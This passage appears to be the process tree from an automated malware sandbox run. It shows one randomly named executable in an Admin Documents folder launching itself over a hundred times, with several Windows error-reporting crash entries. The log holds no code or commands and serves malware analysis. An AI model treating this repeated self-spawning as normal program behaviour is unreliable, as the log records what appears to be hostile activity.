        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:18012
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:3292
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:18056
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:18788
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12524
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19332
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6740
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16788
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19700
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:17688
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19644
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16304
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:14844
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:15132
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:14116
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:20828
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:20176
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 21032 -s 28
        13⤵
        Program crash
        
        PID:20716
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21296
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:20568
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:5900
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19848
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8972
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21704
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1448 -s 28
        13⤵
        Program crash
        
        PID:22788
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10016
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22896
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21752
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22860
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:23488
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22668
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8836
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22612
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19160
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:24064
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22404
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:24224
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:20392
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12468
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:23692
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:23728
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:23892
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10924
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25124
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:24916
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25492
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 25492 -s 28
        13⤵
        Program crash
        
        PID:10124
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21416
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:24496
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25588
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:13320
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:4056
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:14532
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19968
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22704
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:10744
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10744 -s 28
        13⤵
        Program crash
        
        PID:9464
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22696
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22312
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:26260
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:26420
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21952
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12160
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6332
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25916
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:5316
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21396
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27060
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:26732
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27228
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27116
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:18788
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:13980
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:18452
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27904
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22084
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27740
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27696
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21332
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:22944
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:6256
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:26336
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25516
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:4676
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:8896
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:24740
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16896
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:29156
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:28856
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:16012
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:11800
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21976
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25228
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:28484
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:29784
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:30060
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25000
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:29920
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:30256
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:29168
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25688
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:30176
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:30068
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:29112
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:21560
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31216
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:19920
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31108
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:20364
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:30716
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31572
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31496
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:32204
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:15452
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:28532
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:29016
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:32532
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27216
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:23944
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:17188
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:33584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 33584 -s 28
        13⤵
        Program crash
        
        PID:27236
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31840
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31260
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 31260 -s 28
        13⤵
        Program crash
        
        PID:25984
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:31832
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:28028
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:33372
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:29204
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:24204
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:34092
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:30912
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25468
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:32600
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:27780
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:30752
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:12512
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:3644
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:25780
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:33848
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:35032
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:33532
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:26104
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:32540
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        
        C:\Users\Admin\Documents\8m8H4MG_LaWOxWBdTGWXMROj.exe
        12⤵
        
        PID:36420
        
